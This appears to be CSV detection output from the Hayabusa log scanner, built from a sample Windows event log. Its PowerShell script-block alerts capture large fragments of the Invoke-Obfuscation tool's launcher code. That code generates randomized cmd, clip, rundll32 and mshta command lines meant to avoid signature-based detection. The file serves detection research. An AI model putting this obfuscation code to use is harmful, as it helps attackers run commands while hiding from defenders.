2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. 
$InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. 
ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. 
For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. 
$Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. 
If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. 
#OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. 
Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. 
$CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. 
$CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. 
$RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. 
If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host 